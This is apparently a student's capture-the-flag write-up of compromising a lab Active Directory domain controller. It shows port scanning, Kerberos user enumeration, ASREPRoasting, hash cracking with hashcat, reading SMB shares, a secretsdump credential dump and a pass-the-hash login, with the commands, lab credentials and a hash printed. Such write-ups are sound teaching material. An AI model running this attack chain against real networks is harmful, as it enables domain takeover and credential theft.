Active Directory
Tool used: nmap, enum4linux, Impacket, evil-winrm
Scenario: 99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?
By now, I have focused my skills and energy on exploiting Linux machines. However, I want to switch gears and focus on Windows’ Active Directory instead. This shift will help me broaden my horizons and learn not only how to exploit different operating systems but also the various services and systems within that operating system.
Setup
I followed the setup section to install Impact, bloodhound, and Neo4j, after doing so i ran the command to update and upgrade for any issues. Downloading BloudHound and Neo4j did take a long time so I started reading on each tool.
1
sudo apt update && apt upgrade
Impacket
Impacket is a collection of python classes for working with network protocols like IP, TCP and such. It has many features including remote execution, Kerberos, Windows Secrets, Server tools, and etc.
Bloodhound
BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Bloudhound can be used to identify highly complex attack paths, identify and eliminate the paths, gain deeper understanding of privilege relationships
Neo4j
Neo4j is a grapgh database managment system. It is designed to store, manage, and process large amounts of structured and connected data in the form of a graph. Unlike traditional relational databases, which store data in tables with rows and columns, Neo4j organizes data in nodes, relationships, and properties.
evil-winrm
[WinRM] (https://www.kali.org/tools/evil-winrm/)(Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.
This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.
Enumeration
I started the enmueration phase with the basics scanning for open ports using nmap. The result were a lot, but I can see that port 139/445 are open and the question asks about the tool to use to enumerate that port which ofcourse is enum4linux.
Ports scanning
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
nmap -sV 10.10.159.47
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-05-20 09:16:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
SMB Enumeration
We can use enum4linux to enumerate port 139/445 SMB. The command takes two arguments, the -U to get the serlist and the -o To gather OS information of the target. The NetBIOS-Domain name can be found in the result of the enumeration
1
enum4linux -U -o 10.10.159.47
Commonly used invalid Top-level Domain for AD Domain is .local
Kerberos Enumeration
Kerberos is a key authentication service within AD, for the tool that will be used its Kerbute to brute force discover of users, passwords and passwords spray (add later what password spray is)
After setting up Kerbrute to work enumerate the usernames and files i used the previous question hind for the top level domain to write the command below and provided the username list. The command userenum used to enumerate valid usernames
1
./kerbrute userenum --dc 10.10.159.47 -d spookysec.local user.txt
After running the enumeration I noticed 3 users that stood out and svc-admin was the answer to the notable account discovered, and the other one was backup.
Exploiting
Abusing Kerberos
ASREPRoasting attach occurs when a user account has the privilege “Does not require Pre-Authentication” set. Meaning that no valid identification is needed befoee requesting a Kerberos Ticket on the specified user account. Impacket will be used to make this attack happen, it has a tool called GetNPUsers.pythat sllows us to query ASREPRoastable accounts from Key Distrubtion center. I ran the command below with the kerbuser.txt that contains the backup and the svc-admin to see if one of them or both of them are ASREPRoastable accounts. SVC-Admin came back with a long hash I copied the first part of the hash and found it in the hashcat examples as ‘18200 - Kerberos 5, etype 23, AS-REP’
1
python /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile kerbuser.txt -dc-ip 10.10.159.47 spookysec.local/
Cracking the hash using hashcat mode 18200 to find that the password is management2005
1
hashcat -m18200 kerbhash /usr/share/wordlists/rockyou.txt
Back to Enumeration
Enumerating any shares that the domain controller may be giving out. smbclient is used to make remote SMB shares, the option -L lists the shares the command below was used to list the share using the password that was found.
1
2
3
4
5
6
7
8
9
10
11
12
13
smbclient -L 10.10.159.47 -U svc-admin
Enter WORKGROUP\svc-admin's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
For this part i have to use the guide to learn how to use smbclient and what to do. After listing the shares I need to access the backup’s content to view the text file. I used the below command to get the file and when it read the content it was encoded so i used cyberchef to decode the base64 to ‘backup@spookysec.local:backup2517860’
1
smbclient \\\\10.10.159.47\\backup -U svc-admin
Privilege Escalation
Now that we have backup credentials that has unique permission that allows all AD changes to be synced with this user we can use the impacket tool secretsdump.py to retrieve all password hashes that the backup user account has. I ran the below comman to start the attack and retrieve all the user accounts hashes using the backup username and password found in the previous step.
1
python secretsdump.py -just-dc backup@10.10.159.47
After recieving all the hashes for the adminstrator, svc-admin and backup I used the evilwinrm with -H option to pass the user’s hash to log in as the Administrator then i checked each user desktop to finally get the flags.
1
./evil-winrm -i 10.10.159.47 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc